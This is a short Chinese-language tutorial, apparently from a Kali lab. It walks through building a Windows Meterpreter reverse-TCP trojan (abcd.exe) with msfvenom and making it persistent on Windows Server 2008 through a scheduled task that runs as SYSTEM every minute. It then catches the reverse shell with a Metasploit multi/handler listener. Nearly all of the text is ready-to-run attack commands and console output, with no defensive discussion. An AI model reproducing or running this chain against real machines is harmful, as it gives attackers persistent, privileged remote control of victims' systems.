1、填写自己kali地址和要使用的端口号;生成abcd.exe木马;
┌──(kali㉿kali)-[~/桌面]
└─$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.94 LPORT=4455 -f exe > abcd.exe
2、在win2008里面使用这条命令,将创建⼀个abc计划任务,每⼀分钟 执⾏⼀次abcd.exe;
注意abcd.exe路径;
schtasks /create /tn abc /sc minute /mo 1 /tr C:\Windows\system32\abcd.exe /ru system /f
在计算机管理里面可以看见
4、kali使用msfconsole工具进行渗透
┌──(root💀kali)-[~]
└─# msfconsole
5、使用以下模块;
msf6 > use exploit/multi/handler
6、进行配置
配置payload,和先前木马文件一致
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
配置监听kali的IP地址;
msf6 exploit(multi/handler) > set lhost 192.168.31.94
lhost => 192.168.31.94
配置监听端口号
msf6 exploit(multi/handler) > set lport 4455
lport => 4455
查看配置
msf6 exploit(multi/handler) > options
7、监听准备好;
msf6 exploit(multi/handler) > run
这里监听成功;